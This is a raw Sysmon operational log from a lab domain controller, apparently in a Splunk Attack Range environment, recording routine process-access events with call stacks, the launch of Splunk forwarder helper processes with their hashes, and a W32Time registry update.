13:18:20.208{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005061Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:20.208{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005060Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:20.208{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005059Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:20.208{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005058Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:20.208{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005057Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:20.208{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005056Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:20.208{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005055Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:20.208{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005054Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:20.208{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-449C-6000-1F01-000000009A01}4872C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005053Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:20.208{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-449C-6000-1F01-000000009A01}4872C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005052Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:18:20.209{08A6967A-449C-6000-1F01-000000009A01}4872C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 13241300x80000000000000005065Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:18:52.698{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d6ea77-0xcdb1a0fc) 10341000x80000000000000005092Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.809{08A6967A-44D3-6000-2101-000000009A01}47244404C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005091Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.669{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-44D3-6000-2101-000000009A01}4724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005090Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.669{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005089Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.669{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005088Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.669{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005087Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.669{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005086Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.669{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005085Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.669{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005084Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.669{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005083Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.669{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005082Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.669{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005081Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.669{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-44D3-6000-2101-000000009A01}4724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005080Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.669{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-44D3-6000-2101-000000009A01}4724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005079Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.669{08A6967A-44D3-6000-2101-000000009A01}4724C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000005078Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:19:15.153{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-44D3-6000-2001-000000009A01}2152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005077Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 